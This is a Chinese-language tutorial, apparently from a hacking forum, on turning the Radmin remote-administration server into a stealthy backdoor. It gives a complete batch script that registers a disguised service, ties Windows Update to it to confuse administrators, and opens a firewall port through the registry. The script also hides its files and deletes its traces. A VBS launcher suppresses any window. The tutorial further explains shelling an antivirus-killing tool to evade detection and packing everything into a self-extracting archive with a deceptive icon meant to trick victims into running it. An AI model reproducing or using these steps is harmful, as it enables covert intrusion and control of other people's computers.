大家好,關(guān)于如何打造出完美的Radmin服務(wù)端,網(wǎng)上有很多類(lèi)似的修改后的程序,但有的服務(wù)名會(huì)暴露,有的會(huì)顯示CMD窗口,我彌補(bǔ)了它們的缺點(diǎn),綜合了它們的優(yōu)點(diǎn),打造出了現(xiàn)在這個(gè)完美的Radmin服務(wù)端。
準(zhǔn)備工具
Rock免殺工具;
IcoSprite圖標(biāo)更改器;
Killer15殺殺毒軟件防火墻工具;
SC.exe服務(wù)添加刪除更改工具;
AdmDll.dll、Raddrv.dll、R_server(這個(gè)不用說(shuō)了吧,Radmin的服務(wù)端)。
程序特點(diǎn)
自解壓形式,雙擊即可,自動(dòng)解壓到%systemroot%\system32\drivers\目錄下,并能干掉卡巴斯基等殺毒軟件。使用vbs嵌套bat來(lái)執(zhí)行所有內(nèi)容,不會(huì)跳出任何窗口。自建服務(wù),并修改服務(wù)名、顯示名、描述使其做到隱蔽。依存Windows Update服務(wù),給試圖關(guān)閉它帶來(lái)困惑。做完一切后以只讀,隱藏形式隱蔽Radmin服務(wù)端的三個(gè)程序,刪除掉生成的一些REG、BAT、VBS文件,并能夠突破Radmin外部連接進(jìn)來(lái)時(shí)XP SP2防火墻的攔截。
制作過(guò)程
首先自己安裝一下Radmin服務(wù)端,配置完密碼,端口等信息后導(dǎo)出其在HKEY_LOCAL_MACHINE\SYSTEM\RAdmin的注冊(cè)表文件,這里我另存為名Server.reg。然后要修改R_server.exe的圖標(biāo)并修改文件名為迷惑性文字如Update.exe,修改圖標(biāo)我用IcoSprite,覺(jué)得還不錯(cuò)。這樣假如對(duì)方裝有天網(wǎng)之類(lèi)防火墻的話(huà),可以騙過(guò)一些菜鳥(niǎo),同意允許對(duì)外連接。
接下來(lái)我們制作核心部分,最關(guān)鍵的BAT,重要的我將簡(jiǎn)單解釋?zhuān)?
@echo off
@sc stop r_server
‘假如已經(jīng)被裝過(guò)R_server服務(wù),先用SC將它停掉。
@sc delete r_server
‘將已經(jīng)裝過(guò)R_server服務(wù)刪除。
@regedit /s server.reg
@SC create MPservice BinPath= "%systemroot%\system32\drivers\Update.exe /service" type=
own type= interact start= auto DisplayName= "Media Player of Remote Control Driver
Update"
‘這句是用SC建立一個(gè)服務(wù),服務(wù)名為Mpservice,路徑Binpath為"%systemroot%\system32
\drivers\Update.exe /service",類(lèi)型type為 own 與interact交互,啟動(dòng)類(lèi)型start為自動(dòng),
顯示名DisplayName為"Media Player of Remote Control Driver Update"。
@sc description MPservice "為Windows Media Player提供加載進(jìn)程及驅(qū)動(dòng)程序、
庫(kù)提供基層更新安全補(bǔ)丁的服務(wù)。"
‘這句是將MPservice服務(wù)的描述改為“為Windows Media Player提供加載進(jìn)程及驅(qū)動(dòng)程序、
庫(kù)提供基層更新安全補(bǔ)丁的服務(wù)。”
@sc config wuauserv depend= MPservice
‘配置MPservice使wuauserv服務(wù)依存此服務(wù)(wuauserv可以根據(jù)自己喜歡改成其它服務(wù),這里的
wuauserv是系統(tǒng)在Windows Update
網(wǎng)站的自動(dòng)更新服務(wù))。這里的目的是迷惑管理員,使其不敢輕易停止我們生成的Radmin服務(wù)。
@echo Windows Registry Editor Version 5.00 > %systemroot%\system32
\drivers\DisFirewall.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\ParametersFirewallPolicyStandardProfile\GloballyOpenPorts\List] >> %systemroot%\system32\drivers\DisFirewall.reg
‘這里添加成的一個(gè)DisFirewall.reg注冊(cè)表文件,在對(duì)方是XP SP2系統(tǒng)的情況下
將起到很大重要,由于SP2自帶的防火墻配置信息是存
放于注冊(cè)表中的,所有完全可以通過(guò)寫(xiě)入自己想要的信息使你的R_server可以接受
外界的連接。
@echo "5151:TCP"="5151:TCP:*:Enabled:Windows Update Services">> stemroot%\system32
\drivers\DisFirewall.reg
‘這句是允許外部連接5151的TCP端口,設(shè)置防火墻此規(guī)則名為Windows Update Services。
@regedit /s %systemroot%\system32\drivers\DisFirewall.reg
@attrib +h +r %systemroot%\system32\drivers\Update.exe
@attrib +h +r %systemroot%\system32\drivers\admdll.dll
@attrib +h +r %systemroot%\system32\drivers\raddrv.dll
‘以上三句是設(shè)置服務(wù)端三個(gè)文件為隱藏、只讀屬性。
@sc start MPservice
@del /q /f /s %systemroot%\system32\drivers\server.reg
@del /q /f /s %systemroot%\system32\drivers\Update.vbs
@del /q /f /s %systemroot%\system32\drivers\Update.bat
@del /q /f /s %systemroot%\system32\drivers\sc.exe
@del /q /f /s %systemroot%\system32\drivers\DisFirewall.reg
‘以上是清理生成出來(lái)的雜物,加參數(shù)/q是以安靜模式刪除,不要求確認(rèn),
參數(shù)/f是強(qiáng)制刪除只讀文件,參數(shù)/s是從所有子目錄刪除指定文件。 |
接下來(lái)制作一個(gè)vbs文件,作用是令bat里的內(nèi)容以安靜模式執(zhí)行,這樣就可以讓cmd窗口跳出來(lái)了,增加了不少隱蔽性。里面寫(xiě)上如下代碼:
On Error Resume Next
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("Update.bat",0) |
最后出場(chǎng)的是Killer15.exe這個(gè)東東,按它的說(shuō)明書(shū)說(shuō)是可以殺Norton AntiVirus、McAfee、個(gè)人計(jì)算機(jī)Cillin&KAV等。我用我的卡巴2006測(cè)試過(guò),確實(shí)能被它殺掉。由于直接運(yùn)行的話(huà)還沒(méi)執(zhí)行就被殺毒軟件給干掉了,所以給它加個(gè)殼,這里用Rock免殺工具,經(jīng)過(guò)它加的殼后逃過(guò)了我卡巴的大關(guān),格式是:
好了,整理一下:三個(gè)服務(wù)端文件+一個(gè)注冊(cè)表信息,一個(gè)BAT,一個(gè)VBS,一個(gè)SC,一個(gè)Killer15,一共是8個(gè)文件,將它們打包制成自解壓形式。勾選RAR里的“創(chuàng)建自解壓格式壓縮文件”,到高級(jí)里打開(kāi)“自解壓選項(xiàng)”,“解壓路徑”為%systemroot%\system32\drivers\,解壓后運(yùn)行“Update.vbs”,解壓前運(yùn)行“Killer15.new.exe”,模式里選“全部隱藏”跟“跳過(guò)已經(jīng)存在文件”,文本和圖標(biāo)選項(xiàng)里“從文件加載自解壓文件圖標(biāo)”里選一個(gè)迷惑性的ico圖標(biāo)做為自解壓最后生成的圖標(biāo)。OK,一個(gè)自解壓形式的Radmin服務(wù)端就這樣生成了。假如你是*欺騙別人雙擊執(zhí)行的,你還可以自己添加個(gè)小游戲之類(lèi)的進(jìn)去,令它雙擊自解壓的同時(shí)不會(huì)什么反映都沒(méi)有,這里我就不再闡述了。
